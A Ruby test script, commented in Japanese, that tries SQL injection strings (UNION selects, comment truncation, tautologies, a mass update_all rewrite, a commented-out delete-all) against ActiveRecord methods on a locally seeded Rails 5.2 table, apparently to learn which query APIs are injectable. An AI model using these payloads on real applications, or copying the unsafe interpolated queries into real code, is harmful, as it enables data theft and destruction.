RailsでSQL Injectionを実行するsample script

rails_sql_injection.rb

# https://rails-sqli.org/ を参考に ActiveRecord を利用した SQL Injection のサンプルを試す
# 試した環境は Rails 5.2.4
# delete_allやdestroy_allでは引数を渡せない状況になったりもしているので全てのサンプルを試すことはできなかった。
# 
# db/seeds.rb
# (1..100).each do |i|
#   Task.create(name: "task_#{i}")
# end
# 
# db:seed を実行した後に以下のスクリプトを実行する


# https://rails-sqli.org/ 5.0 での確認

puts "### calculate"

p Task.calculate(:sum, :id)

query = "id) FROM tasks where name = 'task_1'; -- "
p Task.calculate(:sum, query)

puts


# https://stackoverflow.com/a/23066966
puts "### exists?"

p Task.count

query = ["1"]
p Task.exists?(query)
p Task.count

puts

# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/FinderMethods.html#method-i-find_by
puts "### find_by"

p Task.count

query = "name = 'task_5'"
p Task.find_by(query)
p Task.count

puts

# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/QueryMethods.html#method-i-from
puts "### from"

p Task.count

query = "tasks where 1 = 1; --"
p Task.from(query).where(name: 'task_5')
p Task.count

puts

# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/QueryMethods.html#method-i-group
puts "### group"

p Task.count

query = "name union select * from tasks"
p Task.where(name: 'task_5').group(query)
p Task.count

puts

# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/QueryMethods.html#method-i-having
puts "### having"

p Task.count

query = "1) union select * from tasks -- "
p Task.where(name: 'task_5').group(:name).having("id > #{query}")
p Task.count

puts

# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/QueryMethods.html#method-i-joins
puts "### joins"

p Task.count

query = " -- "
p Task.joins(query).limit(3)
p Task.count

puts

# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/QueryMethods.html#method-i-order
puts "### order"

p Task.count

query = "(case substr(name, 1, 1) when 'a' then 0 else 1 end)"
p Task.order("#{query} asc")
p Task.count

puts

# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/Calculations.html#method-i-pluck
puts "### order"

p Task.count

query = "name from tasks; --"
p Task.where(name: 'task_5').pluck(query)
p Task.count

puts

# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/QueryMethods.html#method-i-select
puts "### select"

p Task.count

query = "* from tasks; --"
p Task.where(name: 'task_5').select(query)
p Task.count

puts

# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/Relation.html#method-i-update_all
puts "### update_all"

p Task.count

query = "task_xxx' where 1 = 1; -- "
p Task.where(name: 'task_5').update_all("name = '#{query}'")
p Task.where(name: 'task_xxx').count

puts


# https://api.rubyonrails.org/v5.0.2/classes/ActiveRecord/Relation.html#method-i-destroy_all
# 5.2.0 ではそもそも引数綿なせない
# puts "### destroy"
# 
# p Task.count
# 
# query = "1 or 1 = 1 ) -- "
# byebug
# p Task.destroy_all(["#{query}"], nil).to_sql
# p Task.count
# 
# puts



# destroy_all 同様、 5.2.0 ではそもそも引数綿なせない
# puts "### where and delete"
# 
# p Task.count
# 
# query = "1) or 1 = 1-- "
# Task.where("id = #{query}").delete_all
# p Task.count
# 
# puts